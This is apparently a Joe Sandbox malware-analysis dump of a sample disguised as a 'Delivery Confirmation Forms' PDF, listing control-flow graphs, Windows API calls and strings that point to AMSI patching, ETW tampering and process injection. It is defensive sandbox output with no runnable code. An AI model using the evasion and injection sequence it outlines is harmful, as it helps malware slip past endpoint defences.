call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2ce7b98 call 2ce818c call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 ExitProcess 5464->5554 5553->5554 5564 2cf8c8f-2cf8f62 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cee540 call 2cd480c call 2cd494c call 2cd46a4 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd7e18 5553->5564 5822 2cf921a-2cf941b call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd49a4 call 2ce8bb0 5564->5822 5823 2cf8f68-2cf9215 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd4d8c * 2 call 2cd4734 call 2cedacc 5564->5823 5674 2cf7fcb-2cf7fce 5571->5674 5675 2cf7fd0-2cf82f0 call 2cd49a4 call 2cedc90 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cecfa4 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 5571->5675 5572->5571 5674->5675 5991 2cf8309-2cf8aec call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 ResumeThread call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 CloseHandle call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce7ed4 call 2ce87a0 * 6 CloseHandle call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 5675->5991 5992 2cf82f2-2cf8304 call 2ce8584 5675->5992 5822->5554 5823->5822 5991->5464 5992->5991
                                                                  APIs
                                                                    • Part of subcall function 02CE8824: LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
                                                                    • Part of subcall function 02CE8824: FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB
                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E257DC,02E25820,OpenSession,02D3137C,02CFAFD8,UacScan,02D3137C), ref: 02CF7E39
                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8), ref: 02CF8483
                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,00000000,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C), ref: 02CF8602
                                                                    • Part of subcall function 02CE87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,UacScan), ref: 02CE87B4
                                                                    • Part of subcall function 02CE87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CE87CE
                                                                    • Part of subcall function 02CE87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize), ref: 02CE880A
                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02D3137C,02CFAFD8,UacInitialize,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,UacScan,02D3137C), ref: 02CF89F4
                                                                    • Part of subcall function 02CD7E18: GetFileAttributesA.KERNEL32(00000000,?,02CEF8CC,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,UacInitialize), ref: 02CD7E23
                                                                    • Part of subcall function 02CEDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDB9E), ref: 02CEDB0B
                                                                    • Part of subcall function 02CEDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CEDB45
                                                                    • Part of subcall function 02CEDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CEDB72
                                                                    • Part of subcall function 02CEDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CEDB7B
                                                                    • Part of subcall function 02CE818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CE8216), ref: 02CE81F8
                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,Initialize,02D3137C,02CFAFD8,00000000,00000000,00000000,ScanString,02D3137C,02CFAFD8), ref: 02CFAA25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                  • API String ID: 1548959583-1225450241
                                                                  • Opcode ID: 9e344e87efebf94ba208a7955fe0d1d4bde03e3f7ea55785edec8093392f5782
                                                                  • Instruction ID: 50d25da93de453ed353391e10c71991e09211e1397888eb96ed8420edabd2343
                                                                  • Opcode Fuzzy Hash: 9e344e87efebf94ba208a7955fe0d1d4bde03e3f7ea55785edec8093392f5782
                                                                  • Instruction Fuzzy Hash: FE43FD75A501188BDB75EB64CD809DDB3BAEF88300F1141E5E70AAB354DB31AE86EF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10411 2cd1724-2cd1736 10412 2cd173c-2cd174c 10411->10412 10413 2cd1968-2cd196d 10411->10413 10414 2cd174e-2cd175b 10412->10414 10415 2cd17a4-2cd17ad 10412->10415 10416 2cd1a80-2cd1a83 10413->10416 10417 2cd1973-2cd1984 10413->10417 10418 2cd175d-2cd176a 10414->10418 10419 2cd1774-2cd1780 10414->10419 10415->10414 10422 2cd17af-2cd17bb 10415->10422 10423 2cd1a89-2cd1a8b 10416->10423 10424 2cd1684-2cd16ad VirtualAlloc 10416->10424 10420 2cd1938-2cd1945 10417->10420 10421 2cd1986-2cd19a2 10417->10421 10425 2cd176c-2cd1770 10418->10425 10426 2cd1794-2cd17a1 10418->10426 10430 2cd17f0-2cd17f9 10419->10430 10431 2cd1782-2cd1790 10419->10431 10420->10421 10427 2cd1947-2cd195b Sleep 10420->10427 10432 2cd19a4-2cd19ac 10421->10432 10433 2cd19b0-2cd19bf 10421->10433 10422->10414 10434 2cd17bd-2cd17c9 10422->10434 10428 2cd16df-2cd16e5 10424->10428 10429 2cd16af-2cd16dc call 2cd1644 10424->10429 10427->10421 10437 2cd195d-2cd1964 Sleep 10427->10437 10429->10428 10435 2cd182c-2cd1836 10430->10435 10436 2cd17fb-2cd1808 10430->10436 10439 2cd1a0c-2cd1a22 10432->10439 10440 2cd19d8-2cd19e0 10433->10440 10441 2cd19c1-2cd19d5 10433->10441 10434->10414 10442 2cd17cb-2cd17de Sleep 10434->10442 10444 2cd18a8-2cd18b4 10435->10444 10445 2cd1838-2cd1863 10435->10445 10436->10435 10443 2cd180a-2cd181e Sleep 10436->10443 10437->10420 10446 2cd1a3b-2cd1a47 10439->10446 10447 2cd1a24-2cd1a32 10439->10447 10450 2cd19fc-2cd19fe call 2cd15cc 10440->10450 10451 2cd19e2-2cd19fa 10440->10451 10441->10439 10442->10414 10449 2cd17e4-2cd17eb Sleep 10442->10449 10443->10435 10454 2cd1820-2cd1827 Sleep 10443->10454 10460 2cd18dc-2cd18eb call 2cd15cc 10444->10460 10461 2cd18b6-2cd18c8 10444->10461 10455 2cd187c-2cd188a 10445->10455 10456 2cd1865-2cd1873 10445->10456 10458 2cd1a49-2cd1a5c 10446->10458 10459 2cd1a68 10446->10459 10447->10446 10457 2cd1a34 10447->10457 10449->10415 10452 2cd1a03-2cd1a0b 10450->10452 10451->10452 10454->10436 10464 2cd188c-2cd18a6 call 2cd1500 10455->10464 10465 2cd18f8 10455->10465 10456->10455 10463 2cd1875 10456->10463 10457->10446 10466 2cd1a6d-2cd1a7f 10458->10466 10467 2cd1a5e-2cd1a63 call 2cd1500 10458->10467 10459->10466 10471 2cd18fd-2cd1936 10460->10471 10474 2cd18ed-2cd18f7 10460->10474 10468 2cd18cc-2cd18da 10461->10468 10469 2cd18ca 10461->10469 10463->10455 10464->10471 10465->10471 10467->10466 10468->10471 10469->10468
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?,02CD1FC1), ref: 02CD17D0
                                                                  • Sleep.KERNEL32(0000000A,00000000,?,02CD1FC1), ref: 02CD17E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: d14fdc011b6a3eb2b72a16cdd759f75e49c27a3b69644c22b3948ce5361b1e60
                                                                  • Instruction ID: 9a228c1d88be467ce6ec230e6335480717b4b86d05aa08202434c556fadb03a5
                                                                  • Opcode Fuzzy Hash: d14fdc011b6a3eb2b72a16cdd759f75e49c27a3b69644c22b3948ce5361b1e60
                                                                  • Instruction Fuzzy Hash: ADB12372A403408BDB25CF69E880355BBE1EBC5310F1E86AED64DCB385D7B0A955CB90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 02CE8715
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                    • Part of subcall function 02CE7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CE8774
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                  • String ID: DllGetClassObject$W$amsi
                                                                  • API String ID: 941070894-2671292670
                                                                  • Opcode ID: 9443b615ff9baf3116a5749e12293dfc235a0c86ac19204eeb3a78150c37409e
                                                                  • Instruction ID: 0efef748bf3be79652ba97e4eb3961d969f64bea2f05864f625b4c8035a5d31e
                                                                  • Opcode Fuzzy Hash: 9443b615ff9baf3116a5749e12293dfc235a0c86ac19204eeb3a78150c37409e
                                                                  • Instruction Fuzzy Hash: AAF0225000C380B9E600E6748C45F0FBFCE4B92224F448B1CF2E95A2D2D679D1099BB3

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10499 2cd1a8c-2cd1a9b 10500 2cd1b6c-2cd1b6f 10499->10500 10501 2cd1aa1-2cd1aa5 10499->10501 10502 2cd1c5c-2cd1c60 10500->10502 10503 2cd1b75-2cd1b7f 10500->10503 10504 2cd1b08-2cd1b11 10501->10504 10505 2cd1aa7-2cd1aae 10501->10505 10511 2cd16e8-2cd170b call 2cd1644 VirtualFree 10502->10511 10512 2cd1c66-2cd1c6b 10502->10512 10507 2cd1b3c-2cd1b49 10503->10507 10508 2cd1b81-2cd1b8d 10503->10508 10504->10505 10506 2cd1b13-2cd1b27 Sleep 10504->10506 10509 2cd1adc-2cd1ade 10505->10509 10510 2cd1ab0-2cd1abb 10505->10510 10506->10505 10513 2cd1b2d-2cd1b38 Sleep 10506->10513 10507->10508 10515 2cd1b4b-2cd1b5f Sleep 10507->10515 10516 2cd1b8f-2cd1b92 10508->10516 10517 2cd1bc4-2cd1bd2 10508->10517 10520 2cd1ae0-2cd1af1 10509->10520 10521 2cd1af3 10509->10521 10518 2cd1abd-2cd1ac2 10510->10518 10519 2cd1ac4-2cd1ad9 10510->10519 10528 2cd170d-2cd1714 10511->10528 10529 2cd1716 10511->10529 10513->10504 10515->10508 10526 2cd1b61-2cd1b68 Sleep 10515->10526 10524 2cd1b96-2cd1b9a 10516->10524 10523 2cd1bd4-2cd1bd9 call 2cd14c0 10517->10523 10517->10524 10520->10521 10522 2cd1af6-2cd1b03 10520->10522 10521->10522 10522->10503 10523->10524 10530 2cd1bdc-2cd1be9 10524->10530 10531 2cd1b9c-2cd1ba2 10524->10531 10526->10507 10534 2cd1719-2cd1723 10528->10534 10529->10534 10530->10531 10533 2cd1beb-2cd1bf2 call 2cd14c0 10530->10533 10535 2cd1bf4-2cd1bfe 10531->10535 10536 2cd1ba4-2cd1bc2 call 2cd1500 10531->10536 10533->10531 10538 2cd1c2c-2cd1c59 call 2cd1560 10535->10538 10539 2cd1c00-2cd1c28 VirtualFree 10535->10539
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,02CD1FE4), ref: 02CD1B17
                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02CD1FE4), ref: 02CD1B31
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: a1427b7cf9cc671e0c64418713c508a3a5f042f6d09b184ec6045391c1952f9c
                                                                  • Instruction ID: ef12da97dedad08439648140882a8054b3be7a79a365d305e5a8afb72051bf03
                                                                  • Opcode Fuzzy Hash: a1427b7cf9cc671e0c64418713c508a3a5f042f6d09b184ec6045391c1952f9c
                                                                  • Instruction Fuzzy Hash: 5751D0B16003409FE725CF68D984766BBD1AB85314F1C86AED64CCB386E7F0DA45CBA1

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CEE436
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CheckConnectionInternet
                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                  • API String ID: 3847983778-3852638603
                                                                  • Opcode ID: 1454073158890da71dc08c32bda2f280f944adfddd755132d9b938c604775650
                                                                  • Instruction ID: 0b650f51b2749fd20a974ad65a8291c91ace2402269ea60563c149cb1ab41238
                                                                  • Opcode Fuzzy Hash: 1454073158890da71dc08c32bda2f280f944adfddd755132d9b938c604775650
                                                                  • Instruction Fuzzy Hash: 2C41FF35B502089BEF24EBE4CD81A9E73FAEF4C360F114435E646A7250DA74AD069F64
                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • WinExec.KERNEL32(?,?), ref: 02CE8478
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 2292790416-3609268280
                                                                  • Opcode ID: b8b09c33d67dada3df68ac7fa8329b056e6c9c0f99a8d541a325fdebcfd47aee
                                                                  • Instruction ID: 559067b768516b6375b8d3aaeb48c652857a9821cd6998f1b49ad61a6c351bf6
                                                                  • Opcode Fuzzy Hash: b8b09c33d67dada3df68ac7fa8329b056e6c9c0f99a8d541a325fdebcfd47aee
                                                                  • Instruction Fuzzy Hash: 96018C74640204BFEB21EFA4DC51B5A77EDEB48B00F518530B609E3A50DA74ED009F28
                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • WinExec.KERNEL32(?,?), ref: 02CE8478
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
